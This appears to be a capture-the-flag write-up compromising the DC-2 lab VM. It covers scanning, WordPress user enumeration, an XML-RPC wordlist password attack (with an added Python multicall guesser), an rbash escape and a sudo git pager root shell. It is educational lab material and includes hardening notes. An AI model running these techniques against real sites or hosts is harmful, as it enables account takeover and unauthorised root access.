Capture The Frog

Frogs go hop hop lol

DC-2 Write Up

Boot DC-2 in VirtualBox, then from a terminal on the attacking machine find it on the LAN with netdiscover.

 

┌──(root💀snowyowl)-[~]
└─# netdiscover

 11 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 516

   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.3.13    08:00:27:a8:0d:dc      1      60  PCS Systemtechnik GmbH
 192.168.3.1     30:f7:72:be:b9:b9      4     168  Hon Hai Precision Ind. Co.,Ltd.
 192.168.3.2     10:6f:3f:e6:28:40      1      60  BUFFALO.INC
 192.168.3.7     44:09:b8:8c:f4:72      1      60  Salcomp (Shenzhen) CO., LTD.
 192.168.3.14    9e:29:3c:88:76:24      1      42  Unknown vendor
 192.168.3.15    70:bc:10:6a:f6:c1      2      84  Microsoft Corporation
 192.168.10.1    30:f7:72:be:b9:b9      1      42  Hon Hai Precision Ind. Co.,Ltd.

PCS Systemtechnik GmbH is the vendor registered for the 08:00:27 OUI that VirtualBox gives its virtual NICs, so DC-2's LAN address is 192.168.3.13.

 

Now scan that IP with nmap.

Options used here:

-sS: SYN ("stealth") scan. Nmap sends the SYN, reads the SYN/ACK, then tears the connection down with a RST instead of completing the three-way handshake, so the service never sees a full connection.

-A: aggressive detection, which turns on OS detection, version detection, the default NSE scripts and traceroute.

-p-: scan all TCP ports 1-65535 (port 0 is not included). Note that Nmap's version detection skips port 9100 by default so it does not spray probes at network printers; the port is still port-scanned.

 

┌──(root💀snowyowl)-[~]
└─# nmap -sS -A 192.168.3.13 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-27 20:15 JST
Nmap scan report for dc-2 (192.168.3.13)
Host is up (0.00060s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
|_http-generator: WordPress 4.7.10
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: DC-2 – Just another WordPress site
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 08:00:27:A8:0D:DC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.60 ms dc-2 (192.168.3.13)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.20 seconds

 

Two things stand out in the nmap result:

・This is a web server: Apache 2.4.10 on Debian, running the WordPress CMS (version 4.7.10 according to the generator tag).

・SSH is not on the usual port 22 but on 7744 (OpenSSH 6.7p1 in the Debian 8 build, which fits the Linux 3.x/4.x kernel guess).

 

Since it is a web server, put the IP into a browser and...

[screenshot: the browser cannot load the page]

The site redirects every request to http://dc-2/ (nikto reports the same below: "Root page / redirects to: http://dc-2/"). That hostname exists only on this lab network, so a DNS lookup for dc-2 fails and the browser gives up.

So add the name to /etc/hosts on the attacking machine:

[screenshot: /etc/hosts with the line "192.168.3.13 dc-2" added]

With the hosts entry in place,

the site renders properly.

[screenshot: the DC-2 WordPress home page]

                                                                            

Next, probe for exposed directories and files with nikto.


┌──(root💀snowyowl)-[~]
└─# nikto -h http://192.168.3.13
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.3.13
+ Target Hostname:    192.168.3.13
+ Target Port:        80
+ Start Time:         2021-07-27 19:35:47 (GMT9)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: http://dc-2/
+ Uncommon header 'link' found, with multiple values: (<http://dc-2/index.php/wp-json/>; rel="https://api.w.org/",<http://dc-2/>; rel=shortlink,)
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
+ 7915 requests: 0 error(s) and 12 item(s) reported on remote host
+ End Time:           2021-07-27 19:37:12 (GMT9) (85 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The previous box, DC-1, had plenty of exposed directories; this one has hardly any.

We do learn where the WordPress login page is:

(/wp-login.php: Wordpress login found)

The rest of the nikto findings are information leaks (the WordPress version via /wp-links-opml.php and the readme files, missing security headers, the test cookie without the HttpOnly flag), not entry points in themselves.

 

We also search for exploits against this Apache version, but nothing stands out.

┌──(root💀snowyowl)-[~]
└─# searchsploit "Apache 2.4.10"
------------------------------------------------------------------- -------------------------
 Exploit Title                                                     |  Path
------------------------------------------------------------------- -------------------------
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution   | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak                  | linux/webapps/42745.py
Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service               | multiple/dos/26710.txt
Apache OpenSSL - 'OpenFuck.c' Remote BufferOverflow               | unix/remote/21671.c
Apache OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (1)        | unix/remote/764.c
Apache OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow (2)        | unix/remote/47080.c
Apache OpenMeetings - '.ZIP' File Directory Traversal             | linux/webapps/39642.txt
Apache Tomcat < 5.5.17 - Remote Directory Listing                 | multiple/remote/2061.txt
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal               | unix/remote/14489.c
Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)         | multiple/remote/6229.txt
------------------------------------------------------------------- -------------------------
Shellcodes: No Results

 

Nothing here gets us in through the web server itself: the only hit that applies to 2.4.10, the OPTIONS memory leak (Optionsbleed, CVE-2017-9798), is an information disclosure rather than code execution, and the rest target PHP-CGI, Tomcat, CXF, OpenMeetings or ancient OpenSSL. So we go after the CMS instead, the same flow as DC-1, where the CMS was Drupal.

 

For WordPress there is wpscan, a WordPress-specific security scanner from the WPScan team (sponsored by Automattic), so we use it.

https://ja.wordpress.org/plugins/wpscan/

wpscan has a lot of useful options;

$ man wpscan

is worth a read.

Options used this time:

--url URL: the target URL.

-e u: enumerate usernames.



┌──(root💀snowyowl)-[~]
└─# wpscan --url http://dc-2/ -e u                                   
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.3.13]
[+] Started: Tue Jul 27 21:08:38 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, https://wordpress.org/?v=4.7.10
 |  - http://dc-2/index.php/comments/feed/, https://wordpress.org/?v=4.7.10

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <=================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jul 27 21:08:44 2021
[+] Requests Done: 58
[+] Cached Requests: 6
[+] Data Sent: 14.674 KB
[+] Data Received: 514.805 KB
[+] Memory used: 160.348 MB
[+] Elapsed time: 00:00:06

・There are three users: admin, jerry and tom.

Now we need passwords for these three accounts.
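The scan above lists three independent sources for each user name (the wp-json users route, author-ID redirects, and the wording of login errors). The following is an added example written for this write-up, not WPScan's code and not from the original post; it parses the kind of response WordPress 4.7 gives for each source. The sample JSON, redirect targets and login-error HTML are constructed here so it runs offline; they follow the host and user names in the scan output, but they are hand-written stand-ins, not captures.

```python
"""How the three user-enumeration sources reported by wpscan work.

Added example for this write-up; neither WPScan's code nor anything from
the original post. The sample responses below are constructed.
"""
import json
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Source 1, "Wp Json Api": GET /wp-json/wp/v2/users/ lists authors with
# published posts. Constructed to mirror what the scan found (admin, jerry).
SAMPLE_WP_JSON = json.dumps([
    {"id": 1, "name": "admin", "slug": "admin",
     "link": "http://dc-2/index.php/author/admin/"},
    {"id": 2, "name": "jerry", "slug": "jerry",
     "link": "http://dc-2/index.php/author/jerry/"},
])

# Source 2, "Author Id Brute Forcing": GET /?author=N is redirected to
# /author/<login>/ when user N exists; None stands for "no redirect".
SAMPLE_REDIRECTS: Dict[int, Optional[str]] = {
    1: "http://dc-2/index.php/author/admin/",
    2: "http://dc-2/index.php/author/jerry/",
    3: "http://dc-2/index.php/author/tom/",
    4: None,
}

# Source 3, "Login Error Messages": wp-login.php words the error differently
# for an unknown user and for a known user with a wrong password.
LOGIN_ERROR_UNKNOWN = (
    '<div id="login_error"><strong>ERROR</strong>: Invalid username.</div>')
LOGIN_ERROR_KNOWN = (
    '<div id="login_error"><strong>ERROR</strong>: The password you entered '
    'for the username <strong>tom</strong> is incorrect.</div>')
SAMPLE_LOGIN_ERRORS = {"tom": LOGIN_ERROR_KNOWN, "bob": LOGIN_ERROR_UNKNOWN}

_AUTHOR_PATH = re.compile(r"/author/([^/]+)/?$")
_KNOWN_USER = re.compile(
    r"The password you entered for the username <strong>([^<]+)</strong> is incorrect")


def users_from_wp_json(body: str) -> List[str]:
    """The 'slug' field is the login name, which is what an attacker wants."""
    return [user["slug"] for user in json.loads(body)]


def author_from_redirect(location: Optional[str]) -> Optional[str]:
    """Pull the login name out of a /author/<login>/ redirect target."""
    if not location:
        return None
    match = _AUTHOR_PATH.search(urlparse(location).path)
    return match.group(1) if match else None


def user_from_login_error(html: str) -> Optional[str]:
    """Return the user name a login error confirms, or None for 'Invalid username'."""
    match = _KNOWN_USER.search(html)
    return match.group(1) if match else None


def enumerate_users(wp_json_body: str,
                    redirects: Dict[int, Optional[str]],
                    login_errors: Dict[str, str]) -> List[str]:
    """Merge the three sources in the order wpscan reports them, without duplicates."""
    found: List[str] = []

    def add(name: Optional[str]) -> None:
        if name and name not in found:
            found.append(name)

    for name in users_from_wp_json(wp_json_body):
        add(name)
    for _author_id, location in sorted(redirects.items()):
        add(author_from_redirect(location))
    for html in login_errors.values():
        add(user_from_login_error(html))
    return found


if __name__ == "__main__":
    print(enumerate_users(SAMPLE_WP_JSON, SAMPLE_REDIRECTS, SAMPLE_LOGIN_ERRORS))
```

All three behaviours are WordPress defaults, which is why wpscan finds users on a stock install; on the defensive side, restricting the users REST route to authenticated requests, disabling the `?author=N` redirect and making login errors generic removes the three sources this code relies on.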

 

The Flag page on the DC-2 site says it is a good idea to use cewl, so

we use the cewl command.

cewl crawls a web site and collects the words that appear in its pages into a wordlist.

It is not a random or seeded password generator: the point is that words specific to the site are likely to have been reused as passwords.
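To make the cewl step concrete, here is an added example written for this write-up (not cewl itself and not from the original post) that does the core of what cewl does for a single page held in memory: strip the markup, skip script and style contents, and keep each word of at least three letters once, in the order it was first seen (three is cewl's default minimum length). The HTML below is a constructed stand-in for the DC-2 home page, not the real page.

```python
"""Minimal CeWL-style wordlist builder (added example, not cewl's code)."""
import re
from html.parser import HTMLParser
from typing import List

# Constructed page fragment standing in for http://dc-2/ (not the real page).
SAMPLE_HTML = """<html><head><title>DC-2 &#8211; Just another WordPress site</title>
<style>body{color:#000}</style></head>
<body><h1>Flag 1</h1>
<p>Your usual wordlists probably won't work, so instead, maybe you just need to be cewl.</p>
<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Vestibulum parturient.</p>
<script>var x = "ignored";</script></body></html>"""


class _TextExtractor(HTMLParser):
    """Collect visible text, skipping <script> and <style> contents."""

    SKIP = {"script", "style"}

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.chunks: List[str] = []
        self._skip_depth = 0

    def handle_starttag(self, tag, attrs):
        if tag in self.SKIP:
            self._skip_depth += 1

    def handle_endtag(self, tag):
        if tag in self.SKIP and self._skip_depth:
            self._skip_depth -= 1

    def handle_data(self, data):
        if not self._skip_depth:
            self.chunks.append(data)


def wordlist(html: str, min_length: int = 3) -> List[str]:
    """Unique alphabetic words of at least `min_length` letters, first-seen order.

    min_length=3 mirrors cewl's default -m; case is kept, as cewl does unless
    told otherwise, because a password wordlist should match the page exactly.
    """
    parser = _TextExtractor()
    parser.feed(html)
    parser.close()
    seen, words = set(), []
    for word in re.findall(r"[A-Za-z]+", " ".join(parser.chunks)):
        if len(word) >= min_length and word not in seen:
            seen.add(word)
            words.append(word)
    return words


if __name__ == "__main__":
    print("\n".join(wordlist(SAMPLE_HTML)))
```

The real tool additionally follows links to the depth given with -d (default 2), which is what lets it pick up words from every post on the site rather than just the front page.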



┌──(root💀snowyowl)-[~]
└─# cewl -w dc2-password.txt http://dc-2/

 

Point wpscan at the wordlist cewl produced and look for the three

accounts' passwords.

-P <file>: dictionary attack with that password file. Without -U, wpscan tries every user it enumerated.

 


┌──(root💀snowyowl)-[~]
└─# wpscan --url http://dc-2/ -P dc2-password.txt
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://dc-2/ [192.168.3.13]
[+] Started: Tue Jul 27 21:10:03 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.10 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://dc-2/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
 | Found By: Rss Generator (Passive Detection)
 |  - http://dc-2/index.php/feed/, https://wordpress.org/?v=4.7.10
 |  - http://dc-2/index.php/comments/feed/, https://wordpress.org/?v=4.7.10

[+] WordPress theme in use: twentyseventeen
 | Location: http://dc-2/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.8
 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <========> (137 / 137) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] Performing password attack on Xmlrpc against 3 user/s
[SUCCESS] - jerry / adipiscing
[SUCCESS] - tom / parturient
Trying admin / log Time: 00:01:26 <========> (646 / 1121) 57.62% ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Jul 27 21:11:38 2021
[+] Requests Done: 801
[+] Cached Requests: 49
[+] Data Sent: 360.183 KB
[+] Data Received: 427.544 KB
[+] Memory used: 243.969 MB
[+] Elapsed time: 00:01:34

We have passwords for two of the three accounts (the run against admin was still going at 57% with no hit when it was stopped):

・ Username: jerry, Password: adipiscing
  Username: tom, Password: parturient
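The output says the attack was performed "on Xmlrpc". The following is an added example for this write-up, not WPScan's code and not from the original post, showing the mechanism: with xmlrpc.php enabled, a client can call wp.getUsersBlogs(username, password), which returns the caller's blog list on valid credentials and a fault otherwise, and many such calls can be batched inside one system.multicall request. The WordPress side here is a local stand-in so the file runs offline; the two valid combinations come from the scan output, and the other guesses are constructed.

```python
"""Why the wpscan password attack ran "on Xmlrpc" (added example, constructed)."""
import xmlrpc.client
from typing import Dict, List, Tuple

Guess = Tuple[str, str]

# Constructed: the two valid combinations the scan found, plus guesses of
# the kind a cewl wordlist produces.
VALID_CREDS: Dict[str, str] = {"jerry": "adipiscing", "tom": "parturient"}
GUESSES: List[Guess] = [
    ("tom", "parturient"),
    ("jerry", "parturient"),
    ("admin", "log"),
    ("jerry", "adipiscing"),
]


def build_multicall(guesses: List[Guess]) -> bytes:
    """One system.multicall body carrying a wp.getUsersBlogs call per guess."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [user, password]}
             for user, password in guesses]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall").encode()


def simulated_xmlrpc(body: bytes, valid: Dict[str, str]) -> bytes:
    """Stand-in for /xmlrpc.php (constructed, not WordPress code).

    Per call it returns either a one-element list wrapping the result or a
    fault struct; multicall reports faults inline instead of failing the
    whole request, which is what makes batching useful to an attacker.
    """
    (calls,), method = xmlrpc.client.loads(body.decode())
    if method != "system.multicall":
        raise ValueError("only system.multicall is simulated here")
    results = []
    for call in calls:
        user, password = call["params"]
        if call["methodName"] == "wp.getUsersBlogs" and valid.get(user) == password:
            results.append([[{"blogid": "1", "blogName": "DC-2",
                              "url": "http://dc-2/", "isAdmin": False}]])
        else:
            results.append({"faultCode": 403,
                            "faultString": "Incorrect username or password."})
    return xmlrpc.client.dumps((results,), methodresponse=True).encode()


def parse_multicall_response(body: bytes) -> List[bool]:
    """True for each guess that returned data, False for each fault struct."""
    (results,), _ = xmlrpc.client.loads(body.decode())
    return [not (isinstance(item, dict) and "faultCode" in item)
            for item in results]


def crack_offline(guesses: List[Guess], valid: Dict[str, str]) -> List[Guess]:
    """Round-trip one batch through the stand-in and keep the hits."""
    request = build_multicall(guesses)
    response = simulated_xmlrpc(request, valid)
    return [guess for guess, ok in zip(guesses, parse_multicall_response(response)) if ok]


if __name__ == "__main__":
    for user, password in crack_offline(GUESSES, VALID_CREDS):
        print(f"[SUCCESS] - {user} / {password}")
```

Because each HTTP request can carry many guesses and never touches wp-login.php, controls that only watch the login form miss this; disabling xmlrpc.php (or at least system.multicall) and rate limiting it is the corresponding hardening step.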

Use these credentials to log in to DC-2's WordPress admin.

Go to the login path nikto found earlier (/wp-login.php) and log in.

[screenshot: logged in to the WordPress dashboard]

Checking flag2 from the dashboard shows there are still more flags.

Next, connect to DC-2 over the SSH service nmap found.

Here,

    $ ssh tom@192.168.3.13

does not connect, because nothing listens on the default port 22.

This server's SSH listens on 7744, so specify the port:

    $ ssh -p 7744 tom@192.168.3.13

You are asked for a password; enter tom's WordPress password found above (parturient). It is reused for the system account, which is what makes this step work.

 

ls shows flag3.txt.

But cat fails to open it.

That is because the login shell is rbash (restricted bash), which limits what you can run: you cannot change PATH, and you cannot run a command by giving a path containing /.

Normally you could change your login shell from rbash to bash with chsh, but on DC-2 that does not work.

So instead use

    BASH_CMDS[a]=/bin/sh;a
    /bin/bash
    export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin

to get into a normal bash. BASH_CMDS is the array behind bash's command hash table: rbash refuses `/bin/sh` typed as a command, but the bash on this box still accepts a path assigned into that array, so `a` now runs /bin/sh. From that unrestricted sh, start /bin/bash and repair PATH (note the `$` in `$PATH`; the original `PATH=PATH:...` would have thrown away the existing entries). Newer bash releases reject BASH_CMDS assignments containing a slash in restricted mode, so this particular trick depends on the old bash shipped with Debian 8.

Reading flag3.txt:

[screenshot: contents of flag3.txt]

flag4

[screenshot: contents of flag4.txt]

Apparently it wants us to become root.

Trying sudo and the like by themselves does not get us root.

So use

sudo git -p help config

Here -p forces git to page the help text through less, and because git runs under sudo the pager runs as root; from the pager, `!/bin/sh` spawns a root shell (this is the recipe in the GTFOBins entry linked below). It is the same idea as the rbash escape: an interactive program that can spawn a shell lets you leave the restricted context.

https://gtfobins.github.io/gtfobins/git/

The prerequisite is that sudo allows the current user to run git as root, which `sudo -l` will show; wherever that holds, the technique applies, so it is quite reusable.

Become root and cat the flag.

[screenshot: the final flag read as root]